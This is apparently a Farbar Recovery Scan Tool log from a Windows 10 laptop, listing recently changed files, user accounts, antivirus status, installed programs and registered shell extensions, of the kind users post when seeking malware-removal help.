_____ 
C:\WINDOWS\system32\PerfStringBackup.INI 2021-05-07 08:42 - 2019-12-07 17:13 - 000000000 ____D C:\WINDOWS\INF 2021-05-07 08:37 - 2021-01-20 20:37 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\NVIDIA Corporation 2021-05-06 20:59 - 2020-10-01 19:00 - 000000000 ____D C:\Users\FRANCIS\Desktop\Other Files 2021-05-06 19:52 - 2020-09-30 19:34 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2021-05-06 14:18 - 2020-09-29 18:48 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Google 2021-05-06 12:30 - 2019-12-07 17:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2021-05-06 12:21 - 2019-12-07 17:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM 2021-05-06 12:16 - 2019-12-07 17:50 - 000000000 ____D C:\WINDOWS\system32\OpenSSH 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ___RD C:\WINDOWS\PrintDialog 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SystemResources 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\setup 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\oobe 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\Dism 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\Provisioning 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions 2021-05-06 12:16 - 2019-12-07 17:14 - 
000000000 ____D C:\WINDOWS\DiagTrack 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\bcastdvr 2021-05-06 12:14 - 2019-12-07 17:03 - 000000000 ____D C:\WINDOWS\CbsTemp 2021-05-06 12:13 - 2019-12-07 17:52 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\OEMDefaultAssociations.dll 2021-05-06 11:45 - 2020-11-11 21:31 - 000004170 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{BC7AF1B8-2D77-4206-A075-B9FC5A37F7AE} 2021-05-05 12:23 - 2020-12-28 20:55 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2021-05-05 08:24 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\NDF 2021-05-04 18:04 - 2020-10-01 12:14 - 000000000 ____D C:\Program Files (x86)\USB Disk Security 2021-05-04 17:36 - 2019-12-07 17:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2021-05-03 21:54 - 2021-01-28 15:26 - 000000000 ____D C:\Users\FRANCIS\Documents\MATLAB 2021-05-03 20:12 - 2020-12-20 15:43 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\LenovoServiceBridge 2021-05-03 20:02 - 2020-11-16 20:09 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\CrashDumps 2021-05-03 08:56 - 2021-02-05 09:52 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Spotify 2021-05-03 08:55 - 2021-02-05 09:37 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Spotify 2021-05-02 21:07 - 2020-10-01 12:04 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\BitTorrent 2021-05-02 16:43 - 2021-02-24 12:59 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\BitTorrentHelper 2021-05-01 10:09 - 2020-09-29 18:20 - 000002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2021-05-01 10:09 - 2020-09-29 18:20 - 000002283 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 2021-05-01 10:09 - 2020-09-29 18:20 - 000002283 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk 2021-04-29 08:52 - 2020-09-30 20:15 - 000003382 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3936790745-3440936247-791344644-1001 2021-04-29 08:51 - 
2020-09-30 18:58 - 000002376 _____ C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2021-04-28 15:36 - 2020-09-30 09:21 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\ElevatedDiagnostics 2021-04-28 13:17 - 2020-09-29 11:05 - 000000124 _____ C:\WINDOWS\win.ini 2021-04-27 08:12 - 2021-01-26 11:16 - 000000582 _____ C:\WINDOWS\Tasks\MATLAB R2019b Startup Accelerator.job 2021-04-26 17:39 - 2021-01-26 11:16 - 000003252 _____ C:\WINDOWS\system32\Tasks\MATLAB R2019b Startup Accelerator 2021-04-26 17:39 - 2021-01-20 20:37 - 000003152 _____ C:\WINDOWS\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:37 - 000002914 _____ C:\WINDOWS\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000003398 _____ C:\WINDOWS\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000003196 _____ C:\WINDOWS\system32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002984 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002744 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2020-11-17 18:19 - 000002858 _____ 
C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3936790745-3440936247-791344644-1002 2021-04-26 17:39 - 2020-10-07 18:29 - 000003482 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task 2021-04-26 17:39 - 2020-09-30 20:15 - 000003408 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2021-04-26 17:39 - 2020-09-30 20:15 - 000003184 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2021-04-26 15:34 - 2020-03-31 17:20 - 000000000 ____D C:\Users\FRANCIS\Downloads\ZIP 2021-04-25 14:12 - 2019-10-31 17:56 - 000000000 ____D C:\Users\FRANCIS\Downloads\The Sims 4 [anadius Repack] 2021-04-25 12:09 - 2020-10-01 11:43 - 000001051 _____ C:\Users\Public\Desktop\WinRAR.lnk 2021-04-25 12:09 - 2020-10-01 11:43 - 000001051 _____ C:\ProgramData\Desktop\WinRAR.lnk 2021-04-25 12:09 - 2020-10-01 11:43 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2021-04-25 12:09 - 2020-10-01 11:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2021-04-25 12:09 - 2020-10-01 11:42 - 000000000 ____D C:\Program Files\WinRAR 2021-04-24 21:59 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports 2021-04-24 14:27 - 2020-10-07 18:28 - 000002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk 2021-04-22 11:57 - 2021-02-22 13:51 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\et-EE 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\es-MX 2021-04-16 13:24 - 2020-09-30 19:39 - 002877440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2021-04-15 12:00 - 2021-01-20 20:37 - 000001450 _____ C:\Users\Public\Desktop\GeForce Experience.lnk 2021-04-15 
12:00 - 2021-01-20 20:37 - 000001450 _____ C:\ProgramData\Desktop\GeForce Experience.lnk
2021-04-15 12:00 - 2020-09-28 20:13 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2021-04-15 11:59 - 2020-09-28 20:13 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2021-04-15 11:59 - 2020-09-28 20:13 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2021-04-14 14:25 - 2020-09-29 10:54 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-04-14 14:20 - 2020-09-29 10:53 - 131963968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-04-13 20:40 - 2020-10-01 19:00 - 000000000 ____D C:\Users\FRANCIS\Desktop\The Sims Collection
2021-04-13 11:42 - 2020-11-14 20:38 - 000000000 ____D C:\ProgramData\Package Cache
2021-04-12 18:09 - 2020-09-30 18:58 - 000000000 ____D C:\Users\FRANCIS
2021-04-11 14:52 - 2020-09-29 19:44 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\D3DSCache
2021-04-11 09:04 - 2020-09-28 21:07 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2021-04-10 20:56 - 2021-03-30 16:24 - 000000000 ____D C:\ProgramData\Mozilla
2021-04-10 18:05 - 2020-10-03 17:56 - 000000000 ____D C:\Users\PC Gamer Jones\AppData\Roaming\Adobe
2021-04-10 17:19 - 2021-02-26 18:05 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v3 - [CrackzSoft]
2021-04-08 15:12 - 2019-12-07 17:14 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2021-04-07 19:38 - 2021-01-20 20:37 - 002817904 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2021-04-07 19:38 - 2021-01-20 20:37 - 002171760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2021-04-07 19:38 - 2021-01-20 20:37 - 001293680 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvRtmpStreamer64.dll
2021-04-07 10:21 - 2021-04-04 12:00 - 000000000 ____D C:\Users\FRANCIS\Downloads\sims-4-updater-0.5.4
2021-04-07 09:59 - 2020-10-01 18:25 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\SquirrelTemp

==================== Files in the root of some directories ========

2021-04-28 09:18 - 2021-04-28 13:22 - 000000049 _____ () C:\Users\FRANCIS\AppData\Roaming\MCVi2UserDetail.ini
2020-11-17 18:19 - 2020-11-17 18:19 - 000000000 _____ () C:\Users\FRANCIS\AppData\Local\oobelibMkey.log

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-04-2021
Ran by FRANCIS (07-05-2021 11:07:42)
Running from C:\Users\FRANCIS\Downloads
Windows 10 Home Single Language Version 20H2 19042.964 (X64) (2020-09-30 12:18:12)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3936790745-3440936247-791344644-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3936790745-3440936247-791344644-503 - Limited - Disabled)
FRANCIS (S-1-5-21-3936790745-3440936247-791344644-1001 - Administrator - Enabled) => C:\Users\FRANCIS
Guest (S-1-5-21-3936790745-3440936247-791344644-501 - Limited - Disabled)
PC Gamer Jones (S-1-5-21-3936790745-3440936247-791344644-1002 - Limited - Enabled) => C:\Users\PC Gamer Jones
WDAGUtilityAccount (S-1-5-21-3936790745-3440936247-791344644-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee VirusScan (Enabled - Up to date) {9D4501E6-72F6-2877-C789-89AF6F535B2C}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
FW: McAfee Firewall (Enabled) {A57E80C3-3899-292F-ECD6-209A91801C57}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 21.001.20150 - Adobe Systems Incorporated) Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version:  - Adobe) Anaconda3 2020.11 (Python 3.8.5 64-bit) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Anaconda3 2020.11 (Python 3.8.5 64-bit)) (Version: 2020.11 - Anaconda, Inc.) BitTorrent (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\BitTorrent) (Version: 7.10.5.45967 - BitTorrent Inc.) BitTorrent (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\BitTorrent) (Version: 7.10.5.45785 - BitTorrent Inc.) CLUE - Accusations and Alibis (HKLM-x32\...\{952DD7C5-99FB-40A3-9CBF-2F0A46985D2B}) (Version: 1.0 - LeeGTs Games) CLUE Classic (HKLM-x32\...\CLUE Classic_is1) (Version:  - ) Discord (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Discord) (Version: 0.0.309 - Discord Inc.) Dolby Audio X2 Windows API SDK (HKLM\...\{82C288CC-A96D-43E3-9119-944DABF5DD61}) (Version: 0.8.0.74 - Dolby Laboratories, Inc.) Dolby Audio X2 Windows APP (HKLM\...\{9207D68E-666A-49C7-A900-9F5B2FF289E4}) (Version: 0.8.0.71 - Dolby Laboratories, Inc.) Excel (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\1fc5b090eab9aa41f8a2f5987367e6da) (Version: 1.0 - Excel) Excel (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\1fc5b090eab9aa41f8a2f5987367e6da) (Version: 1.0 - Excel) Graphics Rules Maker (HKLM-x32\...\Graphics Rules Maker) (Version: 1.1.0 - SimsNetwork.com) HitmanPro 3.8 (HKLM\...\HitmanPro38) (Version: 3.8.10.298 - SurfRight B.V.) 
Intel® C++ Redistributables on Intel® 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Lenovo Service Bridge (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1) (Version: 5.0.2.2 - Lenovo)
Lenovo System Update (HKLM-x32\...\TVSU_is1) (Version: 5.07.0118 - Lenovo)
Malwarebytes version 4.3.3.116 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.3.3.116 - Malwarebytes)
MATLAB R2019b (HKLM\...\Matlab R2019b) (Version: 9.7 - MathWorks)
McAfee® Total Protection (HKLM-x32\...\MSC) (Version: 16.0 R31 - McAfee, LLC)
Microsoft 365 Apps for enterprise - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.13929.20296 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 90.0.818.51 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\OneDriveSetup.exe) (Version: 21.073.0411.0002 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\OneDriveSetup.exe) (Version: 19.043.0304.0013 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Teams) (Version: 1.3.00.28779 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Teams) (Version: 1.3.00.26064 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{A0E1B43D-5F4A-46AF-9925-ABA3423325DC}) (Version: 2.77.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29913 (HKLM-x32\...\{855e31d2-9031-46e1-b06d-c9d7777deefb}) (Version: 14.28.29913.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29913 (HKLM-x32\...\{03d1453c-7d5c-479c-afea-8482f406e036}) (Version: 14.28.29913.0 - Microsoft Corporation)
Microsoft Visual Studio Code (User) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.56.0 - Microsoft Corporation)
Node.js (HKLM\...\{C6D70F34-C254-4D55-B4A0-55F921939297}) (Version: 15.14.0 - Node.js Foundation)
NVIDIA FrameView SDK 1.1.4923.29781331 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.1.4923.29781331 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.22.0.32 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.22.0.32 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.13929.20296 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.13929.20296 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.13929.20216 - Microsoft Corporation) Hidden
Outlook (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\6b0f23e57a39ebfbf2814acb1a24293d) (Version: 1.0 - Outlook)
Outlook (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\6b0f23e57a39ebfbf2814acb1a24293d) (Version: 1.0 - Outlook)
PowerPoint (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\319814cb56b667dff88f54e08be8f51f) (Version: 1.0 - PowerPoint)
Python 3.9.4 (64-bit) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{e300c142-10a9-46f4-a195-bd40cb90a84f}) (Version: 3.9.4150.0 - Python Software Foundation)
Python 3.9.4 Add to Path (64-bit) (HKLM\...\{D5076D33-101B-4402-AAC0-001C6D74D9AB}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Core Interpreter (64-bit) (HKLM\...\{DE09AD3C-F617-4EAF-B4F5-943473CB00DA}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Development Libraries (64-bit) (HKLM\...\{CCD8CD39-7BDE-46B9-9222-336226D0C346}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Documentation (64-bit) (HKLM\...\{C625291F-C4B5-45A7-B946-FFAB8535A64A}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Executables (64-bit) (HKLM\...\{A8C63C1D-BCF8-4446-AFAA-AE21DDA1DBEF}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 pip Bootstrap (64-bit) (HKLM\...\{2E65BC05-C532-4BD6-ACDD-3CFDE86F5E36}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Standard Library (64-bit) (HKLM\...\{D8D430E7-0DCE-418C-A937-735F329C1AD8}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Tcl/Tk Support (64-bit) (HKLM\...\{E4228F0E-C40C-403A-9533-29BA5A9F9E99}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Test Suite (64-bit) (HKLM\...\{86FD19A0-F018-465C-B8C9-02EA01D35A4B}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Utility Scripts (64-bit) (HKLM\...\{0C0FBC09-C0AA-4B66-92BF-E321BC8C9FA5}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python Launcher (HKLM-x32\...\{12B4CAFF-F2FA-422B-B30C-2265217D8CF8}) (Version: 3.9.7398.0 - Python Software Foundation)
s3pe - Sims3 Package Editor (HKLM-x32\...\s3pe) (Version: 14-0222-1852 - Peter L Jones)
SlimDX Runtime .NET 4.0 x86 (January 2012) (HKLM-x32\...\{7EBD0E43-6AC0-4CA8-9990-00E50069AD29}) (Version: 2.0.13.43 - SlimDX Group)
Spotify (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Spotify) (Version: 1.1.54.592.gc0b20638 - Spotify AB)
Teams Machine-Wide Installer (HKLM-x32\...\{731F6BAA-A986-45A4-8936-7C3AAAAA760B}) (Version: 1.4.0.4167 - Microsoft Corporation)
The Sims 2: Ultimate Collection (HKLM-x32\...\{04450C18-F039-4B81-A621-70C3B0F523D5}) (Version: 1.0.0.1 - Electronic Arts)
The Sims™ 3 [anadius Repack] (HKLM-x32\...\The Sims™ 3_is1) (Version: 1.67.2.024037 - )
TSR Workshop (HKLM-x32\...\{F68B3749-D483-47E6-9BB8-097906F9D471}) (Version: 2.2.92 - The Sims Resource)
USB Disk Security (HKLM-x32\...\USB Disk Security_is1) (Version:  - Zbshareware Lab)
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1-2) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
WebAdvisor by McAfee (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.1.586 - McAfee, LLC)
WinRAR 6.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.01.0 - win.rar GmbH)
Word (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\1b837d0bf93d01407352736c91b7bf50) (Version: 1.0 - Word)
Word (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\1b837d0bf93d01407352736c91b7bf50) (Version: 1.0 - Word)
Zoom (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\ZoomUMX) (Version: 5.4.9 (59931.0110) - Zoom Video Communications, Inc.)
Zoom (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\ZoomUMX) (Version: 5.0 - Zoom Video Communications, Inc.)

Packages:
=========
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.4213.0_x64__8wekyb3d8bbwe [2021-04-28] (Microsoft Studios) [MS Ad]
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.960.0_x64__56jybvy8sckqj [2021-01-20] (NVIDIA Corp.)
Photos Add-on -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2021.39122.10110.0_x64__8wekyb3d8bbwe [2021-03-12] (Microsoft Corporation)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-11-07] (Microsoft Corporation)
PowerPoint -> C:\Program Files\WindowsApps\powerpoint.office.com-8D456796_1.0.0.3_neutral__sxc7ffma4ybfy [2021-05-07] (powerpoint.office.com)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3936790745-3440936247-791344644-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\FRANCIS\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3936790745-3440936247-791344644-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\FRANCIS\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [   AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [   AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [   AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> )
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> )
ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => C:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-05-06] (Malwarebytes Corporation -> Malwarebytes)
